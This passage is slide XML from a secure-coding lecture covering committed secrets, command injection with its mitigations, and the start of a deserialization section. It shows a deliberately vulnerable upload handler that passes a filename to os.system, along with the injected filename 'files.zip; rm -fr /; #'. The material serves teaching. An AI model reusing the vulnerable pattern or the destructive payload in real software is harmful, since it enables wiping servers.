                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Whatever privilege the shell runs at, the attackers commands run as</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1911" name="Google Shape;1911;p270"/>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Command Injection?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Committing Secrets to Source Control</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1015" name="Google Shape;1015;p145"/>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dirty="0"/>
              <a:t>One common source of breaches is secrets committed to public services such as GitHub, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>BitBucket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1"/>
              <a:t>TruffleHog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> will scan public GitHub repositories to identify AWS secret keys, including those that may have been “deleted” but not fully purged from history</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" dirty="0"/>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>In 2015 a developer accidentally committed AWS keys to GitHub and within 5 minutes bots had spawned 140 VM’s to perform Bitcoin mining!</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1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271"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>def upload_file():</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>if request.method == 'POST':</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		file = request.files['file']</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		path = os.path.join('/tmp', file.filename)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		file.save(path)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>			os.system('unzip %s -d /var/www/files', path)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>return redirect('/');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What happens if the user uploads a file named “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>files.zip; rm -fr /; #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1917" name="Google Shape;1917;p271"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="85206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Command Injection</a:t>
            </a:r>
            <a:endParaRPr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272"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4048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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>def upload_file():</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>if request.method == 'POST':</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		file = request.files['file']</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		path = os.path.join('/tmp', file.filename)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		file.save(path)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>os.system('unzip %s -d /var/www/files', path)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="E06666"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>return redirect('/');</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What happens if the user uploads a file named “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EA9999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>files.zip; rm -fr /; #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Answer: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>os.system('unzip files.zip; rm -fr /;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># -d /var/www/files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1923" name="Google Shape;1923;p272"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8520600" cy="5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Command Injection</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1924" name="Google Shape;1924;p272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="7121475" y="4010475"/>
            <a:ext cx="733500" cy="3093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72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4480675" y="4365800"/>
            <a:ext cx="4351500" cy="397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Operating System Not Found...</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pro"/>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273"/>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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Avoid unsafe functions</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PHP: exec(), passthru(), system(), shell_exec(), popen(), proc_open(), pcntl_exec()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Python: os.system(), os.popen*()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" marR="0" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If you must run shell commands with untrusted input, use shlex.quote() to escape user input, and subprocess.call(command, shell=False)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Don’t use user-supplied filenames</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They can contain malicious commands</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Use native libraries</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>e.g. Use Python’s zipfile library, instead of sending commands to the shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1931" name="Google Shape;1931;p2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Command Injection Mitigations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74"/>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Unsafe Deserialization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2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Serialization Overview</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1942" name="Google Shape;1942;p275"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1152475"/>
            <a:ext cx="8520600" cy="3214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Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Need to send a complex Object to a different system</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Serialize the Object into bytes, and Deserialize on other system</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A simple example is JSON serialization/deserialization</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Convert a JavaScript object into a string that can be sent over HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>	email: “mike@example.com”,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>	name: “Mike”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1943" name="Google Shape;1943;p275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4439478" y="3158925"/>
            <a:ext cx="557272" cy="231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75"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
